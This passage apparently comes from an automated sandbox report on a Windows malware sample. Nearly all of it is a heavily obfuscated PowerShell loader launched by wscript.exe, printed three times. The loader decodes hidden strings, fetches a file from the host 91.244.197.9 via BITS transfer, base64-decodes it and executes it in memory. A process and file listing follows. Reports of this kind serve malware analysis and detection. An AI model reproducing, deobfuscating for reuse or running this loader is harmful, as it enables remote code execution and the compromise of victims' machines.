UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 
'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"
cmdline POWERSHELL "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- 
OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs 
HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"
host 91.244.197.9
parent_process wscript.exe martian_process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd 
dauniNatioo PostpLeucomWindbu UnbanForeltDsigh= Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar 
');.($rufulousna01) (Sprg9 'Pighe$ FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"
parent_process wscript.exe martian_process POWERSHELL "Function Sprg9 ([String]$Sydyemene4){$Sidingsku=$Sydyemene4.toCharArray();For($Propolis46=5; $Propolis46 -lt $Sidingsku.count-1; $Propolis46+=(5+1)){$rufulousna+=$Sidingsku[$Propolis46]};$rufulousna;}$Volu=Sprg9 ' WankhCeliotSchelt malep Fagu:Opspa/Obtai/ Skol9March1Sacra.gertr2Woolm4 Redu4 Snig. Alec1Misal9 Drin7concu. Impe9 Llin/LabounOmkoseSpracwnyhed/TndstUunpronIsidosMellelSkatt. DumpjdiplaaSternvSophraFempe ';$rufulousna01=Sprg9 ' TilsiSpksteBarbexBesom ';$Telo = Sprg9 'Wagne\Iconos poiny Kabes CambwBrassoCarbowfulfi6Super4Judic\AfmnsW Aflaistregnhypomd OveroPhospw UtopsKrapfP Ansto AlpiwFestfe BoggrAsphyS antih CaraePensil AntalHekse\Emeliv Erhv1 Baue.Taskm0Modif\BraunpUdtnkoHumanwUddykeCharer QuilsafstihMelipeAfhorlRomtol Besy. PreaeHusarx Socie Solv ';.($rufulousna01) (Sprg9 ' Hejs$BuldeTRevera AviliEtatslFlyvso Bals2 Hype= Foru$ Quilekompln Trisv Subr:Diariw FuseiAmanin BanadAurorifraterBlodf ') ;.($rufulousna01) (Sprg9 'Uddat$ FlawT Conte ArchlCarisoMarkr= Duef$GraniT OrddatommeiAeroplRansaoMckee2 Beas+Escap$ RhopT KonseFertil PuntoExoto ') ;.($rufulousna01) (Sprg9 'Deter$RibbeS AlnivNondea SeafrDixiesBismek GenbrSucce semio= shov unde( Rmet(Blitzg SkinwOversmshinwiFordr kvadw KystiContun Klen3 Deku2 Brne_ OverpUnresr Vegeo ThrecSemiheAntimsMothwsJoggi Trygh-NgaioF Unga DawnPAltarr GenfoUnhelcSenateKotowsAntiasvillaIViscidRejse=Udbls$ Tilh{UndefP MistIStemmD Noxi} Morp)Prveu.VelkeCRewaroDivismLineam Aguaa Duodn progd PsitL SammiTheomnMidfre Drag)Esdra part-Pastis JulepSirell Tilsi PejltFrost Norma[Craftc Skolh Hecta Anaer Tiko] Udto3 Ooph4 Udga ');.($rufulousna01) (Sprg9 ' Fugl$ CampaSkyttfmolinsaarhukFromeeDekladSnildsGrfab Trip= Ring Rispe$JegerS SunbvPlumeaMomskr RegisUnconkBenstr Over[ Data$efterSVesicv RetsaAksiorCreossKonomk SinorSaffa.Ughs c bosso TousuChairnTypehtForda-Airdr2Chlor]Orang ');.($rufulousna01) (Sprg9 'Skrid$PhospWStenba Landd dauniNatioo PostpLeucomWindbu UnbanForeltDsigh= 
Kern(bydefTOnaneekondosFlourtOffse- OverPUnlina PanetElforh tran Subge$ AngiT Vaske LunglIndsko Belb)Espie Disco-VrktjAPreben Eased Phil Tandh(Dobbe[ AntiIUnclenTittutBndelP MisltBriber Bern]Bediz:Bight:BistasOpruliSubinz Bambe ampe Emne-BiogreMors qSylla Probl8Posta) Rumi ') ;if ($Wadiopmunt) {.$Telo $afskeds;} else {;$rufulousna00=Sprg9 ' MarkS ElevtSuggea ElekrConset Dels-TuggeB Mesoi StratBiogrs DesiTConchr IdeaaDysgenAngoss FeltfAnmele Outbr Hipp Jule-SekslSSinoloFremsu Strir Counc SimoeUncin pret$RepulV caskoCorral HexauUrger Haplo-TubfiDLimemeBrydesLocaltDesiniSansen HenfaCampit Anali StveoPachyn Shar Subco$ SlatTCrossaKorali SikklParagoTelev2 Spec ';.($rufulousna01) (Sprg9 'Bortf$FanliT NanoaGyse i VinnlKaryoo Home2Tuber=Skjol$HaunteRattlnLatesvSkval:outtha PlanpEpeirp MeladHandla SolotTaktlaUnpre ') ;.($rufulousna01) (Sprg9 ' VersIMerchmScrippSamfro Histr EjentDamec-BlaamMZonuloPannadBestyu StrilHalefe Bass IndsiBOeer i GlostBinapsDactyT KendrAfganarangsnUndersPhaeofMestreIsolerPrein ') ;$Tailo2=$Tailo2+'\Geadepha.Tri';while (-not $gvinkele) {.($rufulousna01) (Sprg9 'Minim$Demong Finav Intei SeminInappk HandeTintnl PriseOpsli= Dekl( HirpT Rumse Gotrs HalvtComme- VandP BekvaHarputTeca hFrowa Char$ DiphTAmuttaRygkliMrkedlSawbao cock2 Diso)Troll ') ;.($rufulousna01) $rufulousna00;.($rufulousna01) (Sprg9 ' itseSBivuatSholeaSignarSkilltBassi-SeamaS AnchlSortee IngeeSphenpaouad Hjemm5Risen ');}.($rufulousna01) (Sprg9 ' Affe$ StrmS ObjepFejemr PilogDrive stets=svejs calcGHandwe kongtClach- BengCHjlndo FejlnRetrotDebuteVandbn StictBagta Genne$ChalyTTonesa UskniInfoll ObtuoHstpa2Spado ');.($rufulousna01) (Sprg9 'Laant$InhalK AtheoKujonnCampskSutoru OpfibPrema Aksel=Alkal centr[ KompS Muriy Spers Marst Berbe Gorkm Flas.OveraCAmmesoMyocon Assyv Lepte Rmmer Ddmat Impu]Sasch:Under: SydaFTidssrHumidoOpvismKerneBLysrea EnewsSlagpeSamse6 Sent4FourtSTillrt Resir Anchi Terrn Glung Elev(Alleg$ArchhSRewasp EurorKyu SgHusma)Curar ');.($rufulousna01) (Sprg9 'Pighe$ 
FraprSkrivuGotchfEnebouBaccalinvoko UdfluFlancs HjlpnCoasta Kake2 Dump Inka=Veste ges [FortjSbruniy langs Tyktt biolePyrommArbor.CarriTArbeje Antox ClautCalvi.talloE Bentn BalecOpkoboGlasudMeloti UdvenHomozgsympa]Subsu: Eksp:VaderACoquiS KundCAlluvI SecrIBoxer.BladhGHetere Recot AchiS Halvt quinr Patti JegsnFalmegBleph( repr$SeiyuKInquaoRedpon Fritk Skudu DensbUsand)Sextu ');.($rufulousna01) (Sprg9 'Impas$ TronP UngteKvindrGennecDuran1Curia2Conce1 Apes=Tagre$frostr Blafu GgehfLegaru armbl lednopapilu SanisFornunKrebia Enke2 Humm.DeipasLowliuPyraubStadssYakutt Knarr TabeiDibranDdssyg Kali(Sortk2Catas0Norte2 Kiru2 Ford4 Velb7rille, sigt2 Snke5 Cass0 folk5Letva2Compl) Gaar ');.($rufulousna01) $Perc121;}"
Time & API Arguments Status Return Repeated

__anomaly__

tid: 2256
message: Encountered 65537 exceptions, quitting.
subcategory: exception
function_name:
1 0 0
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Program Files\Qemu-ga\qemu-ga.exe
file C:\Program Files\qga\qga.exe